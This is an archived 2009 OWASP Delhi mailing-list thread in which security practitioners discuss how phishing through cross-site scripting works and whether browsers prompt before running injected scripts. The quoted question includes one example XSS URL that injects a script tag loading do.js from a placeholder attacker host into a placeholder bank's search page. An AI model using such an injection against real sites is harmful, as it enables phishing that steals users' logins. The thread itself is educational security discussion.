[Owasp-delhi] Phishing with XSS

Karthik Muthukrishnan karthik.muthukrishnan at tcs.com
Fri Feb 27 06:45:26 EST 2009


The result of this XSS attack depends on how the application processes ( or
how vulnerable it is to ) the 'Search' parameter.

On a successful XSS attack, the attack script in the search parameter must
be embedded in the HTML of the search results page. In this case, the
attack script will just run silently, like other scripts in <script> tags.

The browser (behavior varies depending on MIME type) will prompt you with a
save-as message box only when the XSS attack caused web application
('search' page) to download the remote file and send it to user. FF in my
system just displays the script text. In IE7, after I click open, I am
presented with a security warning about unknown publisher.


Karthik Muthukrishnan
Information Risk Management Consultant
Tata Consultancy Services
Mailto: karthik.muthukrishnan at tcs.com
Website: http://www.tcs.com
____________________________________________
Experience certainty.   IT Services
                  Business Solutions
                  Outsourcing
____________________________________________


                                                                           
             Parmendra Sharma                                              
             <s.parmendra at gmai                                             
             l.com>                                                     To 
             Sent by:                  owasp-delhi at lists.owasp.org         
             owasp-delhi-bounc                                          cc 
             es at lists.owasp.or                                             
             g                                                     Subject 
                                       [Owasp-delhi] Phishing with XSS     
                                                                           
             02/25/2009 04:56                                              
             PM                                                            
                                                                           
                                                                           
                                                                           




Hello OWASP Members,

I have a doubt and here it is......

In performing Phishing with XSS a script like "do.js "

"http://www.attacked-bank.com/module.asp?search=<Script
src=http://attacker-IP-address/do.js/>"

can be used to change the original login page to the attackers choice
without actually changing the URL.

Now my question is that for performing the abovesaid case this script needs
to be executed by the browser without the user's concent. In general
scenerio while requesting for a script like this first a Pop up is given by
the browser asking whether to run or to save the script.

Please suggest.



--
Thanks and Regards:

Parmendra Sharma
Indian Computer Emergency Response Team (CERT-In)
Ministry of Information Technology
Government of India
6 C.G.O Complex
Lodhi Road
New Delhi_______________________________________________
Owasp-delhi mailing list
Owasp-delhi at lists.owasp.org
https://lists.owasp.org/mailman/listinfo/owasp-delhi

ForwardSourceID:NT000124A2

=====-----=====-----=====
Notice: The information contained in this e-mail
message and/or attachments to it may contain 
confidential or privileged information. If you are 
not the intended recipient, any dissemination, use, 
review, distribution, printing or copying of the 
information contained in this e-mail message 
and/or attachments to it are strictly prohibited. If 
you have received this communication in error, 
please notify us by reply e-mail or telephone and 
immediately and permanently delete the message 
and any attachments. Thank you





More information about the Owasp-delhi mailing list